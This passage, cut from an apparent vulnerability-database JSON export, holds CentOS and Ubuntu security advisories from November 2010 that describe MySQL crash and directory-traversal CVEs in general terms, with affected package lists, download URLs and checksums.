denial of service, as mysqld was automatically restarted after\nthe crash. (CVE-2010-3837)\n\nIt was found that MySQL did not properly pre-evaluate LIKE arguments in\nview prepare mode. A remote, authenticated attacker could possibly use this\nflaw to crash mysqld. (CVE-2010-3836)\n\nA flaw was found in the way MySQL processed statements that assign a value\nto a user-defined variable and that also contain a logical value\nevaluation. A remote, authenticated attacker could use this flaw to crash\nmysqld. This issue only caused a temporary denial of service, as mysqld was\nautomatically restarted after the crash. (CVE-2010-3835)\n\nA flaw was found in the way MySQL evaluated the arguments of extreme-value\nfunctions, such as LEAST and GREATEST. A remote, authenticated attacker\ncould use this flaw to crash mysqld. This issue only caused a temporary\ndenial of service, as mysqld was automatically restarted after the crash.\n(CVE-2010-3833)\n\nA flaw was found in the way MySQL processed EXPLAIN statements for some\ncomplex SELECT queries. A remote, authenticated attacker could use this\nflaw to crash mysqld. This issue only caused a temporary denial of service,\nas mysqld was automatically restarted after the crash. (CVE-2010-3682)\n\nA flaw was found in the way MySQL processed certain alternating READ\nrequests provided by HANDLER statements. A remote, authenticated attacker\ncould use this flaw to provide such requests, causing mysqld to crash. This\nissue only caused a temporary denial of service, as mysqld was\nautomatically restarted after the crash. (CVE-2010-3681)\n\nA flaw was found in the way MySQL processed CREATE TEMPORARY TABLE\nstatements that define NULL columns when using the InnoDB storage engine. A\nremote, authenticated attacker could use this flaw to crash mysqld. This\nissue only caused a temporary denial of service, as mysqld was\nautomatically restarted after the crash. (CVE-2010-3680)\n\nA flaw was found in the way MySQL processed JOIN queries that attempt to\nretrieve data from a unique SET column. A remote, authenticated attacker\ncould use this flaw to crash mysqld. This issue only caused a temporary\ndenial of service, as mysqld was automatically restarted after the crash.\n(CVE-2010-3677)\n\nAll MySQL users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing this\nupdate, the MySQL server daemon (mysqld) will be restarted automatically.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2010-November/017144.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-November/017145.html\n\n**Affected packages:**\nmysql\nmysql-bench\nmysql-devel\nmysql-server\nmysql-test\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2010-0825.html", "edition": 1, "reporter": "CentOS Project", "published": "2010-11-05T10:26:35", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "mysql security update", "type": "centos", "bulletinFamily": "unix", "cvelist": ["CVE-2010-3837", "CVE-2010-3680", "CVE-2010-3839", "CVE-2010-3835", "CVE-2010-3681", "CVE-2010-3833", "CVE-2010-3840", "CVE-2010-3682", "CVE-2010-3836", "CVE-2010-3677", "CVE-2010-3838"], "modified": "2010-11-05T10:28:34", "href": "http://lists.centos.org/pipermail/centos-announce/2010-November/017144.html", "id": "CESA-2010:0825", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-10-03T18:26:53", "references": ["https://rhn.redhat.com/errata/RHSA-2010-0824.html", "http://pgp.mit.edu:11371/pks/lookup?op=get&search=0xBEFA581B"], "affectedPackage": [{"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.1.22-2.el4_8.4", "arch": "x86_64", "packageName": "mysql-bench", "packageFilename": "mysql-bench-4.1.22-2.el4_8.4.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.1.22-2.el4_8.4", "arch": "x86_64", "packageName": "mysql-devel", "packageFilename": "mysql-devel-4.1.22-2.el4_8.4.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.1.22-2.el4_8.4", "arch": "i386", "packageName": "mysql", "packageFilename": "mysql-4.1.22-2.el4_8.4.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.1.22-2.el4_8.4", "arch": "i386", "packageName": "mysql", "packageFilename": "mysql-4.1.22-2.el4_8.4.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.1.22-2.el4_8.4", "arch": "i386", "packageName": "mysql-bench", "packageFilename": "mysql-bench-4.1.22-2.el4_8.4.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.1.22-2.el4_8.4", "arch": "i386", "packageName": "mysql-devel", "packageFilename": "mysql-devel-4.1.22-2.el4_8.4.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.1.22-2.el4_8.4", "arch": "x86_64", "packageName": "mysql-server", "packageFilename": "mysql-server-4.1.22-2.el4_8.4.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.1.22-2.el4_8.4", "arch": "any", "packageName": "mysql", "packageFilename": "mysql-4.1.22-2.el4_8.4.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.1.22-2.el4_8.4", "arch": "any", "packageName": "mysql", "packageFilename": "mysql-4.1.22-2.el4_8.4.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.1.22-2.el4_8.4", "arch": "x86_64", "packageName": "mysql", "packageFilename": "mysql-4.1.22-2.el4_8.4.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.1.22-2.el4_8.4", "arch": "i386", "packageName": "mysql-server", "packageFilename": "mysql-server-4.1.22-2.el4_8.4.i386.rpm", "operator": "lt"}], "description": "**CentOS Errata and Security Advisory** CESA-2010:0824\n\n\nMySQL is a multi-user, multi-threaded SQL database server. It consists of\nthe MySQL server daemon (mysqld) and many client programs and libraries.\n\nIt was found that the MySQL PolyFromWKB() function did not sanity check\nWell-Known Binary (WKB) data. A remote, authenticated attacker could use\nspecially-crafted WKB data to crash mysqld. This issue only caused a\ntemporary denial of service, as mysqld was automatically restarted after\nthe crash. (CVE-2010-3840)\n\nA flaw was found in the way MySQL processed certain alternating READ\nrequests provided by HANDLER statements. A remote, authenticated attacker\ncould use this flaw to provide such requests, causing mysqld to crash. This\nissue only caused a temporary denial of service, as mysqld was\nautomatically restarted after the crash. (CVE-2010-3681)\n\nA directory traversal flaw was found in the way MySQL handled the\nparameters of the MySQL COM_FIELD_LIST network protocol command. A remote,\nauthenticated attacker could use this flaw to obtain descriptions of the\nfields of an arbitrary table using a request with a specially-crafted\ntable name. (CVE-2010-1848)\n\nAll MySQL users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing this\nupdate, the MySQL server daemon (mysqld) will be restarted automatically.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2010-November/017142.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-November/017143.html\n\n**Affected packages:**\nmysql\nmysql-bench\nmysql-devel\nmysql-server\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2010-0824.html", "edition": 1, "reporter": "CentOS Project", "published": "2010-11-05T10:22:54", "title": "mysql security update", "type": "centos", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2010-3681", "CVE-2010-3840", "CVE-2010-1848"], "modified": "2010-11-05T10:23:42", "href": "http://lists.centos.org/pipermail/centos-announce/2010-November/017142.html", "id": "CESA-2010:0824", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:37", "references": [], "description": "===========================================================\r\nUbuntu Security Notice USN-1017-1 November 11, 2010\r\nmysql-5.1, mysql-dfsg-5.0, mysql-dfsg-5.1 vulnerabilities\r\nCVE-2010-2008, CVE-2010-3677, CVE-2010-3678, CVE-2010-3679,\r\nCVE-2010-3680, CVE-2010-3681, CVE-2010-3682, CVE-2010-3683,\r\nCVE-2010-3833, CVE-2010-3834, CVE-2010-3835, CVE-2010-3836,\r\nCVE-2010-3837, CVE-2010-3838, CVE-2010-3839, CVE-2010-3840\r\n===========================================================\r\n\r\nA security issue affects the following Ubuntu releases:\r\n\r\nUbuntu 6.06 LTS\r\nUbuntu 8.04 LTS\r\nUbuntu 9.10\r\nUbuntu 10.04 LTS\r\nUbuntu 10.10\r\n\r\nThis advisory also applies to the corresponding versions of\r\nKubuntu, Edubuntu, and Xubuntu.\r\n\r\nThe problem can be corrected by upgrading your system to the\r\nfollowing package versions:\r\n\r\nUbuntu 6.06 LTS:\r\n mysql-server-5.0 5.0.22-0ubuntu6.06.15\r\n\r\nUbuntu 8.04 LTS:\r\n mysql-server-5.0 5.0.51a-3ubuntu5.8\r\n\r\nUbuntu 9.10:\r\n mysql-server-5.1 5.1.37-1ubuntu5.5\r\n\r\nUbuntu 10.04 LTS:\r\n mysql-server-5.1 5.1.41-3ubuntu12.7\r\n\r\nUbuntu 10.10:\r\n mysql-server-5.1 5.1.49-1ubuntu8.1\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nDetails follow:\r\n\r\nIt was discovered that MySQL incorrectly handled certain requests with the\r\nUPGRADE DATA DIRECTORY NAME command. An authenticated user could exploit\r\nthis to make MySQL crash, causing a denial of service. This issue only\r\naffected Ubuntu 9.10 and 10.04 LTS. &#40;CVE-2010-2008&#41;\r\n\r\nIt was discovered that MySQL incorrectly handled joins involving a table\r\nwith a unique SET column. An authenticated user could exploit this to make\r\nMySQL crash, causing a denial of service. This issue only affected Ubuntu\r\n6.06 LTS, 8.04 LTS, 9.10 and 10.04 LTS. &#40;CVE-2010-3677&#41;\r\n\r\nIt was discovered that MySQL incorrectly handled NULL arguments to IN&#40;&#41; or\r\nCASE operations. An authenticated user could exploit this to make MySQL\r\ncrash, causing a denial of service. This issue only affected Ubuntu 9.10\r\nand 10.04 LTS. &#40;CVE-2010-3678&#41;\r\n\r\nIt was discovered that MySQL incorrectly handled malformed arguments to the\r\nBINLOG statement. An authenticated user could exploit this to make MySQL\r\ncrash, causing a denial of service. This issue only affected Ubuntu 9.10\r\nand 10.04 LTS. &#40;CVE-2010-3679&#41;\r\n\r\nIt was discovered that MySQL incorrectly handled the use of TEMPORARY\r\nInnoDB tables with nullable columns. An authenticated user could exploit\r\nthis to make MySQL crash, causing a denial of service. This issue only\r\naffected Ubuntu 6.06 LTS, 8.04 LTS, 9.10 and 10.04 LTS. &#40;CVE-2010-3680&#41;\r\n\r\nIt was discovered that MySQL incorrectly handled alternate reads from two\r\nindexes on a table using the HANDLER interface. An authenticated user could\r\nexploit this to make MySQL crash, causing a denial of service. This issue\r\nonly affected Ubuntu 6.06 LTS, 8.04 LTS, 9.10 and 10.04 LTS.\r\n&#40;CVE-2010-3681&#41;\r\n\r\nIt was discovered that MySQL incorrectly handled use of EXPLAIN with\r\ncertain queries. An authenticated user could exploit this to make MySQL\r\ncrash, causing a denial of service. This issue only affected Ubuntu\r\n6.06 LTS, 8.04 LTS, 9.10 and 10.04 LTS. &#40;CVE-2010-3682&#41;\r\n\r\nIt was discovered that MySQL incorrectly handled error reporting when using\r\nLOAD DATA INFILE and would incorrectly raise an assert in certain\r\ncircumstances. An authenticated user could exploit this to make MySQL\r\ncrash, causing a denial of service. This issue only affected Ubuntu 9.10\r\nand 10.04 LTS. &#40;CVE-2010-3683&#41;\r\n\r\nIt was discovered that MySQL incorrectly handled propagation during\r\nevaluation of arguments to extreme-value functions. An authenticated user\r\ncould exploit this to make MySQL crash, causing a denial of service. This\r\nissue only affected Ubuntu 8.04 LTS, 9.10, 10.04 LTS and 10.10.\r\n&#40;CVE-2010-3833&#41;\r\n\r\nIt was discovered that MySQL incorrectly handled materializing a derived\r\ntable that required a temporary table for grouping. An authenticated user\r\ncould exploit this to make MySQL crash, causing a denial of service.\r\n&#40;CVE-2010-3834&#41;\r\n\r\nIt was discovered that MySQL incorrectly handled certain user-variable\r\nassignment expressions that are evaluated in a logical expression context.\r\nAn authenticated user could exploit this to make MySQL crash, causing a\r\ndenial of service. This issue only affected Ubuntu 8.04 LTS, 9.10,\r\n10.04 LTS and 10.10. &#40;CVE-2010-3835&#41;\r\n\r\nIt was discovered that MySQL incorrectly handled pre-evaluation of LIKE\r\npredicates during view preparation. An authenticated user could exploit\r\nthis to make MySQL crash, causing a denial of service. &#40;CVE-2010-3836&#41;\r\n\r\nIt was discovered that MySQL incorrectly handled using GROUP_CONCAT&#40;&#41; and\r\nWITH ROLLUP together. An authenticated user could exploit this to make\r\nMySQL crash, causing a denial of service. &#40;CVE-2010-3837&#41;\r\n\r\nIt was discovered that MySQL incorrectly handled certain queries using a\r\nmixed list of numeric and LONGBLOB arguments to the GREATEST&#40;&#41; or LEAST&#40;&#41;\r\nfunctions. An authenticated user could exploit this to make MySQL crash,\r\ncausing a denial of service. &#40;CVE-2010-3838&#41;\r\n\r\nIt was discovered that MySQL incorrectly handled queries with nested joins\r\nwhen used from stored procedures and prepared statements. An authenticated\r\nuser could exploit this to make MySQL hang, causing a denial of service.\r\nThis issue only affected Ubuntu 9.10, 10.04 LTS and 10.10. &#40;CVE-2010-3839&#41;\r\n\r\nIt was discovered that MySQL incorrectly handled improper WKB data passed\r\nto the PolyFromWKB&#40;&#41; function. An authenticated user could exploit this to\r\nmake MySQL crash, causing a denial of service. &#40;CVE-2010-3840&#41;\r\n\r\n\r\nUpdated packages for Ubuntu 6.06 LTS:\r\n\r\n Source archives:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.0.22-0ubuntu6.06.15.diff.gz\r\n Size/MD5: 178188 38c129d7339c89f4eba4c19fd3b48a8e\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.0.22-0ubuntu6.06.15.dsc\r\n Size/MD5: 1765 c0d4e7d49f9857c71d8e91c1e7cc54b2\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.0.22.orig.tar.gz\r\n Size/MD5: 18446645 2b8f36364373461190126817ec872031\r\n\r\n Architecture independent packages:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-client_5.0.22-0ubuntu6.06.15_all.deb\r\n Size/MD5: 39978 7ebcc42187ede799d071276d38f83744\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-common_5.0.22-0ubuntu6.06.15_all.deb\r\n Size/MD5: 42518 6e367452a0b3d168c574ae64219137b1\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-server_5.0.22-0ubuntu6.06.15_all.deb\r\n Size/MD5: 39982 acd2b86e437fb3734f460a60c47cee44\r\n\r\n amd64 architecture &#40;Athlon64, Opteron, EM64T Xeon&#41;:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.22-0ubuntu6.06.15_amd64.deb\r\n Size/MD5: 6738602 55b4fd61adaad42c04b76ae0877a8e83\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.22-0ubuntu6.06.15_amd64.deb\r\n Size/MD5: 1424234 722761a4b65614aa2cc8efba06ad5355\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.22-0ubuntu6.06.15_amd64.deb\r\n Size/MD5: 6900952 01a5e128ed55a06e1f903a9574c7ea61\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.22-0ubuntu6.06.15_amd64.deb\r\n Size/MD5: 22544490 29001d165026dc416d10ade074875cca\r\n\r\n i386 architecture &#40;x86 compatible Intel/AMD&#41;:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.22-0ubuntu6.06.15_i386.deb\r\n Size/MD5: 6144586 01eac83af471566e10d59ae33f7d5fe0\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.22-0ubuntu6.06.15_i386.deb\r\n Size/MD5: 1385448 04a1b919fa386e3643d85eaeb492523b\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.22-0ubuntu6.06.15_i386.deb\r\n Size/MD5: 6280628 3a34833a57e23ea89f5170d97877b511\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.22-0ubuntu6.06.15_i386.deb\r\n Size/MD5: 21354962 ab094c08f1f58089191a7d22ae82cef2\r\n\r\n powerpc architecture &#40;Apple Macintosh G3/G4/G5&#41;:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.22-0ubuntu6.06.15_powerpc.deb\r\n Size/MD5: 6888510 8a132e1b19c8d1098dfdfe7a49b4f209\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.22-0ubuntu6.06.15_powerpc.deb\r\n Size/MD5: 1465260 8075c27e698ec920ca6b903ef3e5ce49\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.22-0ubuntu6.06.15_powerpc.deb\r\n Size/MD5: 6948840 37c008fd0ceb7ae6b750e349809e6466\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.22-0ubuntu6.06.15_powerpc.deb\r\n Size/MD5: 22709850 02e275075e5f5ed187711e18f64c4952\r\n\r\n sparc architecture &#40;Sun SPARC/UltraSPARC&#41;:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.22-0ubuntu6.06.15_sparc.deb\r\n Size/MD5: 6437636 fe08465f8cd8345ab7f25f9245ca42c9\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.22-0ubuntu6.06.15_sparc.deb\r\n Size/MD5: 1437450 c2de9127465bd162681ba142887627dd\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.22-0ubuntu6.06.15_sparc.deb\r\n Size/MD5: 6551944 7bd359130b6050359bf5ff0adb1a9b20\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.22-0ubuntu6.06.15_sparc.deb\r\n Size/MD5: 21975892 1093883548b2cddc46a4a2aea2647e97\r\n\r\nUpdated packages for Ubuntu 8.04 LTS:\r\n\r\n Source archives:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.0.51a-3ubuntu5.8.diff.gz\r\n Size/MD5: 358579 56c0452e6f36686c9d05f7933468fe02\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.0.51a-3ubuntu5.8.dsc\r\n Size/MD5: 2071 1c364151ad3abb3134e357e1d50388a6\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.0.51a.orig.tar.gz\r\n Size/MD5: 17946664 6fae978908ad5eb790fa3f24f16dadba\r\n\r\n Architecture independent packages:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-client_5.0.51a-3ubuntu5.8_all.deb\r\n Size/MD5: 53298 63abcf36b00ba0d561e41de747147a98\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-common_5.0.51a-3ubuntu5.8_all.deb\r\n Size/MD5: 62088 1d8703413d7f71aade6445c9efabcc83\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-server_5.0.51a-3ubuntu5.8_all.deb\r\n Size/MD5: 55488 f130cf8f453bcfbc22690c1958fbea00\r\n\r\n amd64 architecture &#40;Athlon64, Opteron, EM64T Xeon&#41;:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.51a-3ubuntu5.8_amd64.deb\r\n Size/MD5: 7614932 605808ad3b237f7f0ae1c21d6f79758a\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.51a-3ubuntu5.8_amd64.deb\r\n Size/MD5: 1887226 ebb497ab886c9faca52a42552180c3fb\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.51a-3ubuntu5.8_amd64.deb\r\n Size/MD5: 8252196 c3c737f644b47b805186ce7b00a6d33e\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.51a-3ubuntu5.8_amd64.deb\r\n Size/MD5: 28161616 f1af5e0e4c18c5bbdc2bb4fff40fb8f2\r\n\r\n i386 architecture &#40;x86 compatible Intel/AMD&#41;:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.51a-3ubuntu5.8_i386.deb\r\n Size/MD5: 7223194 63dc0d96dd4ff34be31c9b6da6a72f27\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.51a-3ubuntu5.8_i386.deb\r\n Size/MD5: 1832772 0dd80f740bcbe40122ed32577514a2d6\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.51a-3ubuntu5.8_i386.deb\r\n Size/MD5: 7834082 5434145509e6a9ac7ab328f9a6979aa0\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.51a-3ubuntu5.8_i386.deb\r\n Size/MD5: 27568916 3fb255106105df17bb48ba3af49474e0\r\n\r\n lpia architecture &#40;Low Power Intel Architecture&#41;:\r\n\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.51a-3ubuntu5.8_lpia.deb\r\n Size/MD5: 7163494 a4a032940ebe2756cf44bb8b30fbe8b4\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.51a-3ubuntu5.8_lpia.deb\r\n Size/MD5: 1828002 8791d74e55c730f2f8162428cb8d3d7c\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.51a-3ubuntu5.8_lpia.deb\r\n Size/MD5: 7845656 ded7c6756b5d7a27b0194f532247bf31\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.51a-3ubuntu5.8_lpia.deb\r\n Size/MD5: 27362950 ee96550d3a80a90b6b16eb1f1d5affd3\r\n\r\n powerpc architecture &#40;Apple Macintosh G3/G4/G5&#41;:\r\n\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.51a-3ubuntu5.8_powerpc.deb\r\n Size/MD5: 7589774 9ee36ca16f7ec707666bbb45b39dca91\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.51a-3ubuntu5.8_powerpc.deb\r\n Size/MD5: 1916848 8a3183f14b7ae5a63de8e9459e6922b0\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.51a-3ubuntu5.8_powerpc.deb\r\n Size/MD5: 8245266 277ac8cba87b4e838aaf894749f9ce7e\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.51a-3ubuntu5.8_powerpc.deb\r\n Size/MD5: 28354820 926ce81e465a584a2a0d1cc3329c063a\r\n\r\n sparc architecture &#40;Sun SPARC/UltraSPARC&#41;:\r\n\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.51a-3ubuntu5.8_sparc.deb\r\n Size/MD5: 7202436 7b4b220badd74fd992ba8c6ff7b35ea0\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.51a-3ubuntu5.8_sparc.deb\r\n Size/MD5: 1847528 44344dcfec06342310da94329b5227ce\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.51a-3ubuntu5.8_sparc.deb\r\n Size/MD5: 7836440 c211e18849940108270801431c3ebf33\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.51a-3ubuntu5.8_sparc.deb\r\n Size/MD5: 27650038 2667b9132784e43f5f8ceba7c355acf5\r\n\r\nUpdated packages for Ubuntu 9.10:\r\n\r\n Source archives:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.1/mysql-dfsg-5.1_5.1.37-1ubuntu5.5.diff.gz\r\n Size/MD5: 343665 186b3a556b81532075ad6feb344cfe0c\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.1/mysql-dfsg-5.1_5.1.37-1ubuntu5.5.dsc\r\n Size/MD5: 2522 c7d66071d8d446783bcbb2cf0dfb6e3b\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.1/mysql-dfsg-5.1_5.1.37.orig.tar.gz\r\n Size/MD5: 17814352 a472b99a174592f052c37042764fea3e\r\n\r\n Architecture independent packages:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.1/libmysqlclient16-dev_5.1.37-1ubuntu5.5_all.deb\r\n Size/MD5: 65264 9d79bdf716a4d8a092d567157ee975be\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.1/mysql-client_5.1.37-1ubuntu5.5_all.deb\r\n Size/MD5: 65324 e0d910bdc10310194d99bc2c165ae333\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.1/mysql-common_5.1.37-1ubuntu5.5_all.deb\r\n Size/MD5: 71164 220c35b60d80d28224d2113bd143c686\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.1/mysql-server_5.1.37-1ubuntu5.5_all.deb\r\n Size/MD5: 65452 2861f2ea8fbf2abc314fd3cdf14872e0\r\n\r\n amd64 architecture &#40;Athlon64, Opteron, EM64T Xeon&#41;:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.1/libmysqlclient-dev_5.1.37-1ubuntu5.5_amd64.deb\r\n Size/MD5: 2402648 44b830a893d6e77bc617f97254ef7da8\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.1/libmysqlclient16_5.1.37-1ubuntu5.5_amd64.deb\r\n Size/MD5: 1960428 41178f99f4922a8290cc758df2340ab2\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.1/libmysqld-dev_5.1.37-1ubuntu5.5_amd64.deb\r\n Size/MD5: 5667062 b8a5623cead76e5950ec2f403ae663b8\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.1/libmysqld-pic_5.1.37-1ubuntu5.5_amd64.deb\r\n Size/MD5: 4437346 2423a9a6878cd44d606eced3bc197c2f\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.1/mysql-client-5.1_5.1.37-1ubuntu5.5_amd64.deb\r\n Size/MD5: 8837650 d7d866861a2498596dfee73287ef9813\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.1/mysql-server-5.1_5.1.37-1ubuntu5.5_amd64.deb\r\n Size/MD5: 7273026 3ac85a659f16dbd878053a2dd695d6a1\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.1/mysql-server-core-5.1_5.1.37-1ubuntu5.5_amd64.deb\r\n Size/MD5: 4128168 3161fe5ab9ce1296cd40938873f1b103\r\n\r\n i386 architecture &#40;x86 compatible Intel/AMD&#41;:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.1/libmysqlclient-dev_5.1.37-1ubuntu5.5_i386.deb\r\n Size/MD5: 2332702 1ce8580e6af3b788a09c7d7a0a8d40ac\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.1/libmysqlclient16_5.1.37-1ubuntu5.5_i386.deb\r\n Size/MD5: 1904404 027b42bde9632c2065720ffcb6f738c7\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.1/libmysqld-dev_5.1.37-1ubuntu5.5_i386.deb\r\n Size/MD5: 5433794 e926b1d9b454cb9d89afa063ca2d663f\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.1/libmysqld-pic_5.1.37-1ubuntu5.5_i386.deb\r\n Size/MD5: 4211558 d2df1d1cd42197ca3bfca48b6e39ffe4\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.1/mysql-client-5.1_5.1.37-1ubuntu5.5_i386.deb\r\n Size/MD5: 8209846 0926ae62554a127a283d6f7a2605c279\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.1/mysql-server-5.1_5.1.37-1ubuntu5.5_i386.deb\r\n Size/MD5: 7187446 5c415f1385767b85b07a73dc48210744\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.1/mysql-server-core-5.1_5.1.37-1ubuntu5.5_i386.deb\r\n Size/MD5: 3841096 